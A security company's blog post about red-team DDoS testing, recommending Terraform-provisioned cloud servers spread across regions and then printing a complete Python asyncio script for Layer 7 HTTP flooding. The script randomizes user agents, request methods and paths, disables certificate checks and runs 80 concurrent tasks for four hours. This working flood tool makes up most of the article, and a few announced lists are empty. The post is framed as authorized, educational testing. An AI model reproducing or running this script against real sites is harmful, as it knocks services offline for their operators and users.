⚠️ Warning: This article is intended for educational and ethical purposes only ⚠️
Red teamers don’t often engage in DDoS campaigns or stress testing against client systems, mainly for two reasons:
However, there are cases where clients explicitly request such activities. When that happens, the red team must be thoroughly prepared; both legally, to clearly define the scope and methodology, and technically, to execute the engagement effectively.
If you’re a company considering this type of assessment, ensure you have detailed discussions with your providers about their approach: If they suggest something as simplistic as sending oversized ping packets from their workstations, take it as a red flag (no pun intended).
Given the sensitivity of DDoS testing, realism is key. A meaningful assessment requires a geographically distributed infrastructure with at least a few dozen servers.
My approach to this and other red teaming tasks involves defining infrastructure as code (using IaC tools like Terraform) and leveraging various cloud providers for provisioning.
Over time, I have automated the provisioning of various red teaming infrastructures, including:
Please note that, in the case of DDoS, not all cloud providers may allow the use of their infrastructure like this. Depending on the specifics and use case, it could violate their terms of service or result in significant costs. Thoroughly research your options before selecting a provider to avoid potential bans or unexpected expenses. Personally, I have never spent more than a few cents per hour for the necessary infrastructure, making it an extremely cost-effective approach.
Of course, simply automating the deployment of geographically distributed servers across different data centers isn’t enough: the critical component is the script that performs the actual attack. During provisioning, this script is automatically copied to the servers and executed as soon as they are ready. Its logic varies depending on the target and specific use case, but it typically involves strategies for Layer 7 (HTTP) call flooding.
Here are some tricks that can be implemented in the script:
Below is a simple Proof of Concept in Python:
import aiohttp
import asyncio
import random
import string
import ssl
from aiohttp import TCPConnector
from datetime import datetime, timedelta
DRY_RUN = False # Set to True to simulate requests
TARGET_URLS = ["https://target1.example", "https://target2.example"] # List of target URLs
DURATION = 14400 # Total duration of the attack in seconds
CONCURRENCY = 80 # Number of concurrent tasks
REQUEST_TIMEOUT = 3 # Timeout for each request in seconds
# List of User-Agent strings
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:90.0) Gecko/20100101 Firefox/90.0",
.....
.....
MANY OTHERS
]
# HTTP methods to randomize
REQUEST_METHODS = ["GET", "POST", "PUT", "DELETE"]
# Counter for successful requests
request_count = 0
# Function to fetch public IP
async def fetch_public_ip():
try:
async with aiohttp.ClientSession() as session:
async with session.get("https://api.ipify.org") as response:
ip = await response.text()
return ip
except Exception as e:
return f"Error fetching IP: {e}"
# Function to generate a random path occasionally
def generate_optional_random_path():
if random.random() < 0.35: # 35% chance of appending a random path
length = random.randint(5, 15) # Random path length
return "/" + "".join(random.choices(string.ascii_letters + string.digits, k=length))
return ""
# Function to create a session with SSL certificate validation bypassed
def create_unverified_session(timeout):
ssl_context = ssl.create_default_context()
ssl_context.check_hostname = False # Disable hostname checking
ssl_context.verify_mode = ssl.CERT_NONE # Disable certificate verification
connector = TCPConnector(ssl=ssl_context)
return aiohttp.ClientSession(connector=connector, timeout=timeout)
# Function to send HTTP requests
async def send_requests(session, end_time, target_url):
global request_count
while datetime.now() < end_time:
try:
# Generate target URL (random path occasionally)
path = generate_optional_random_path()
url = f"{target_url}{path}"
method = random.choice(REQUEST_METHODS)
if DRY_RUN:
print(f"[DRY_RUN] Simulated {method} request to {url}")
else:
headers = {"User-Agent": random.choice(USER_AGENTS)}
if method == "GET":
async with session.get(url, headers=headers, timeout=REQUEST_TIMEOUT) as response:
await response.text()
elif method == "POST":
async with session.post(url, headers=headers, data={}, timeout=REQUEST_TIMEOUT) as response:
await response.text()
elif method == "PUT":
async with session.put(url, headers=headers, data={}, timeout=REQUEST_TIMEOUT) as response:
await response.text()
elif method == "DELETE":
async with session.delete(url, headers=headers, timeout=REQUEST_TIMEOUT) as response:
await response.text()
request_count += 1
except Exception:
pass # Ignore errors
# Main attack function
async def main():
global request_count
start_time = datetime.now()
end_time = start_time + timedelta(seconds=DURATION)
# Fetch and print public IP address
print("Fetching public IP address...")
public_ip = await fetch_public_ip()
print(f"Public IP Address: {public_ip}")
print(f"Attack against targets {TARGET_URLS} started at: {start_time} (DRY_RUN: {DRY_RUN})")
timeout = aiohttp.ClientTimeout(total=REQUEST_TIMEOUT)
async with create_unverified_session(timeout) as session:
# Create tasks for each target URL
tasks = []
for target_url in TARGET_URLS:
for _ in range(CONCURRENCY // len(TARGET_URLS)): # Distribute concurrency
tasks.append(asyncio.create_task(send_requests(session, end_time, target_url)))
# Run tasks concurrently
await asyncio.sleep(DURATION)
# Cancel all tasks after the duration
for task in tasks:
task.cancel()
try:
await task
except asyncio.CancelledError:
pass
end_time_actual = datetime.now()
print(f"Attack ended at: {end_time_actual}")
print(f"Total number of requests sent: {request_count}")
# Run the script
if __name__ == "__main__":
asyncio.run(main())
That’s pretty much it!
What about you? Have you ever handled this type of activity before? How did you approach it?
Did you learn from this article? Perhaps you’re already familiar with some of the techniques above? If you find cybersecurity issues interesting, maybe you could start in a cybersecurity or similar position here at Würth Phoenix.